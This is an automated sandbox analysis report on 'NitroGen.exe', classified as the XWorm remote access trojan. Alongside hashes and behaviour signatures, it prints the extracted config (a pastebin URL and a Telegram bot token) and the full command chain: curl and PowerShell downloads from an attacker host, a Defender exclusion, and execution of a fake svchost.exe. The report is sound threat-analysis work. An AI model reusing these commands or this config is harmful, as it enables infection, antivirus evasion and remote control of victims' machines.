Overview

overview

10

Static

static

3

NitroGen.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    10s
  • max time network
    12s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10-11-2024 21:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NitroGen.exe

  • Size

    244KB

  • MD5

    ba199a53400605e0dddec76f0bbb5d4f

  • SHA1

    81182bc28677dd07a8731d196244fb9643bde827

  • SHA256

    f273e967b289bf3c275aae486b8a49918a136c332fce84986417aac2f65d3a6a

  • SHA512

    578b6ac9bad24da3811239c8346e7d8fd33e2e3b1a322dddb829ce6336b5683421913f4dc8a12190d404ac8aa86129458b6ff3c24911a54986a485a61da815eb

  • SSDEEP

    1536:Grae78zjORCDGwfdCSog01313Rys5gCqbReEi0j+Rf21D2k:+ahKyd2n31F53/EAM2k

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/mDSLGN9q

  • telegram

    https://api.telegram.org/bot7168105056:AAGVK3B7ZFupxq4PpmnBpxAQOwJ5CUp76ow/sendMessage?chat_id=1992635040

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
    "C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c main.bat
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Windows\system32\curl.exe
        curl "https://download.t3k.site/d/TKZb9w6VkHTZyX68SiFGSXTD4mJnGe2pfci7dxQOrMkT6Ys58THoTTOTEwSQ" -o installer.bat
        3⤵
          PID:2396
        • C:\Windows\system32\curl.exe
          curl "https://download.t3k.site/d/VM5Pb1HkPC4lGvDGlSx6uv8qU8NTIBUCeSGvPdsb7fvePGrDEjfhfc4dTCXl" -o run.vbs
          3⤵
            PID:3936
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\run.vbs"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3460
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c installer.bat
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:6012
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Powershell -Command "Set-MpPreference -ExclusionExtension exe"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1008
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Powershell -Command "Invoke-Webrequest 'https://download.t3k.site/d/vRjJCJlmX67rqifdZJH928gmqpPY0zcSgTwsV6NkTNTMtGKkm1SsVymBQVDz' -OutFile 'svchost.exe'"
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5376
              • C:\Users\Admin\AppData\Roaming\svchost.exe
                .\svchost.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2096

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

        SHA1

        9910190edfaccece1dfcc1d92e357772f5dae8f7

        SHA256

        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

        SHA512

        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat
        Filesize

        256B

        MD5

        e262e5bd963c829357048858a2d64e04

        SHA1

        2884d6841512bc948a7daee268da91240faa3c13

        SHA256

        14fe35548160972a32833d45cd302460b39876ea26b7646f6b424c8654ce1b55

        SHA512

        694d507b078ddab1ad5cdb653f33507f716557609dff9a78e1091b7efde9093f5155d2bcd7e921a0ce581d6f3bd8fdd68b996452b956e7ceaa1d5c7dec5ce2de

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gwfr3cjx.wzw.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\installer.bat
        Filesize

        257B

        MD5

        ae00757e6487b0c2ac116e09d5fd59c5

        SHA1

        3b4e7403b8934e8f31b68fbdff63fa063a91bd56

        SHA256

        57a777cf4a032ddc12d85b93fcbed6960608bb42e612b8ab224fbf5aff8f4f8e

        SHA512

        9431e99b9179fb2e33a5c227e9fc603e9c61b1db9f247b08c6b9874bb80b6510ff215c04e04ea9a77150307eb27c8dcc0dab4ce5f0757a13cdb5adbce9d98e15

        Download Submit

      • C:\Users\Admin\AppData\Roaming\run.vbs
        Filesize

        134B

        MD5

        6d346aad37debed59b302c74a50d5ff7

        SHA1

        356bd92ec121ec0a3f4b1c12ef81ada47ebf6429

        SHA256

        b4033fe422e7f1a0351bac53c119321b6c90b6877e65fef4de17bbbba2a767f2

        SHA512

        58865078ebf065fa969bed3b26172101f67193aaf6e9e018aa87d46ec535f982739a7b4526ad78c72788f71dd6d63094add2837a3c610d8ca345da8eab254112

        Download Submit

      • C:\Users\Admin\AppData\Roaming\svchost.exe
        Filesize

        83KB

        MD5

        cf73759724ceaffa0353900bd428a555

        SHA1

        a62a68b7a2c0db839f05a763a9c5bda7b92f4709

        SHA256

        39d928ef59af8f60ad6ff7dc973cc3d00e3f6751d5fd3824c615c311b0a14da0

        SHA512

        d6340601e1a3ebda121390d55a3f2fbb6a1fd38e8fb51115823377f72087ef17409eafe41c182736c20b70ce25fabc1f83750112804b981c34d791c69e403e11

        Download Submit

      • memory/1008-13-0x000002106AAA0000-0x000002106AAC2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2096-34-0x0000000000B90000-0x0000000000BAC000-memory.dmp

        Filesize

        112KB

        Download